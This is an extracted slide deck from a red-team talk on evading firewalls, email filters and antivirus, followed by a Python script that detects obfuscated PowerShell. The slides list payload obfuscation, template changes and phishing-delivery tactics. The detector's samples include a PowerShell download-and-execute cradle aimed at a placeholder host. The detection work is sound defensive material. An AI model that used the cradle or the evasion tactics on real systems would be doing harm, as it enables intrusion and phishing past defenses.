This document provides an overview of modern evasion techniques for bypassing network defenses. It discusses using PowerShell, macros, and C# to generate payloads that can evade detection from antivirus vendors like Palo Alto, Fortinet, Cisco, and Proofpoint. Specific evasion tactics covered include obfuscating payloads, customizing Meterpreter, using Empire instead of Metasploit, modifying templates, and delivering payloads via links instead of attachments. The document demonstrates how to generate custom C# payloads, use PowerShell to bypass defenses, and encrypt payloads with Ebowla. It recommends tools like MSF, Empire, Pupy, Unicorn, and Ebowla for evasion and
4. About
Jason Lang @curi0usJack
• 10+ years full time InfoSec
• Sr Consultant @ TrustedSec
• Specialties: Active Directory, Development (C#, Python, PowerShell)
• Hobbies: Woodworking, Beekeeping, Fly Fishing
7. Inline Controls
• Defined: A network layer control that performs real-time threat prevention
• Two biggest contenders: Palo Alto, Fortinet.
• My testing was performed with a fully licensed, up-to-date Palo Alto, as well as a Cisco 5500 with FirePower
8. Test Cases
Meterpreter (stock)
• windows/x64/meterpreter/reverse_https
• Default certificate
• Port 443
Empire
• Empire 2.1
• Default Certificate
• Standard stager
• Port 443
Pupy
• obfs3 transport
• Defaults
• Port 443
Custom Meterpreter
• Custom C# code
• Whatever I wanted
Victim Machines: Windows 7/10 x64, Windows Defender
23. Inline Evasions
• Pay attention to Decryption/Detection patterns.
• Favor Empire/Pupy over MSF if you are getting detected. Change all defaults.
• Change your template**.
• Hope you’re working with a Cisco firewall.
** https://www.blackhillsinfosec.com/modifying-metasploit-x64-template-for-av-evasion/
24. Email Controls
• Defined: Anything that stops my phish from getting to the inbox
• Examples: Proofpoint, Mimecast, Google spam filters
45. Email Workarounds
1. Obfuscate your payload (generally the most basic will do)
2. Set SPF/DKIM Records
3. Use links instead of attachments
4. mod_rewrite is your friend
5. Check the phish with isnotspam.com
6. Don’t trip threshold alerts. Send targeted phish slowly
47. Anti-Virus
• First thing’s first: Understand current state
• Test payloads against Virus Total
• Focused on the major players: Symantec, McAfee, Trend, Windows Defender, Cylance
48. Anti-Virus
Type          Template  Args/Notes            Detections  Major Player
Binary (x86)  No        None                  51/64       Yes
Binary (x64)  No        None                  41/64       Yes
Binary (x64)  Yes       None                  16/62       Yes
Binary (x64)  Yes       Custom C#             6/64        Yes (MS)
Binary (x64)  Yes       C#, -e xor -i 4       3/64        Yes (MS)
Binary (x64)  Yes       C#, -e zutto_dekiru   2/64        No
PowerShell    No        Unicorn               1/56        No
Binary (x64)  Yes       Ebowla                0/64        No
53. AV Evasion #2 - PowerShell
• AV Vendors are simply searching for strings
• Remove all comments
• Change function names / param names
• Concatenate your encoded commands
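The detection-side counterpart to this slide, as an added example that is not code from the talk or from TrustedSec: a log pipeline that matches PowerShell command lines against plain strings is exactly what comment stripping and string concatenation defeat, so the script below normalizes each command line first (decodes -EncodedCommand, removes comments, joins 'a'+'b' literals, and rewrites .('Name') member calls to .Name) and then runs the same indicator patterns against the raw and the normalized text, so the difference is visible. The sample command lines, the hypothetical example.invalid URL and the small indicator set are constructed for this example; renaming of attacker-defined functions is not something normalization can undo, so this only covers the transformations that change how a known call is spelled.

```python
import base64
import re

# Constructed sample process-creation command lines (not from the talk).
# Line 2 splits a method name across concatenated literals; line 3 carries the
# same command through -EncodedCommand; line 4 is benign.
_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLE_LOGS = [
    "powershell.exe -nop -w hidden -c " + _CMD,
    "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
    ".('Down'+'load'+'String')('http://example.invalid/a')",
    "powershell.exe -nop -w hidden -enc "
    + base64.b64encode(_CMD.encode("utf-16le")).decode("ascii"),
    "powershell.exe -Command Get-ChildItem C:\\Users",
]

# -EncodedCommand and the abbreviations PowerShell accepts, followed by base64.
ENC_RE = re.compile(r"(?<!\S)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
# 'a' + 'b' (or "a" + "b") with nothing but plain text inside the literals.
CONCAT_RE = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*\1([^'"]*)\1""")
# .('Name') member access, which PowerShell resolves to .Name at runtime.
METHOD_RE = re.compile(r"""\.\(\s*(['"])([A-Za-z_][\w-]*)\1\s*\)""")

# Constructed indicator patterns for the demo; a real ruleset would be larger.
INDICATORS = {
    "webclient": re.compile(r"\bnet\.webclient\b", re.I),
    "downloadstring": re.compile(r"\bdownloadstring\b", re.I),
    "iex": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
}


def decode_encoded_command(cmdline: str) -> str:
    """Replace '-enc <base64>' with the UTF-16LE script it encodes."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        script = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not valid base64/UTF-16: leave the line untouched
    return cmdline[: m.start()] + script + cmdline[m.end():]


def strip_comments(script: str) -> str:
    """Drop <# block #> and # line comments (naive: ignores '#' inside strings)."""
    script = re.sub(r"<#.*?#>", " ", script, flags=re.S)
    return re.sub(r"#[^\r\n]*", "", script)


def collapse_concatenation(script: str) -> str:
    """Repeatedly join adjacent literals until 'a'+'b'+'c' becomes 'abc'."""
    prev = None
    while prev != script:
        prev = script
        script = CONCAT_RE.sub(
            lambda m: m.group(1) + m.group(2) + m.group(3) + m.group(1), script
        )
    return script


def normalize(cmdline: str) -> str:
    """Apply all normalizations so indicator matching sees the effective script."""
    script = decode_encoded_command(cmdline)
    script = strip_comments(script)
    script = collapse_concatenation(script)
    return METHOD_RE.sub(lambda m: "." + m.group(2), script)


def match_indicators(text: str) -> list:
    """Names of the indicator patterns that hit, sorted for stable comparison."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan(cmdline: str) -> dict:
    """Compare a naive raw-string match against the match after normalization."""
    return {
        "raw": match_indicators(cmdline),
        "normalized": match_indicators(normalize(cmdline)),
    }


if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        result = scan(line)
        print(f"raw={result['raw']} normalized={result['normalized']}  {line[:60]}")
```

Running it prints one line per sample: the first (plain) command line hits all four indicators either way, the concatenated and the encoded variants lose most hits on the raw text but recover them after normalization, and the benign Get-ChildItem line matches nothing in both passes. Script block logging (event 4104) gives a defender the already-decoded script and is the better source where available; this normalization is for the process command line, which is what many pipelines have.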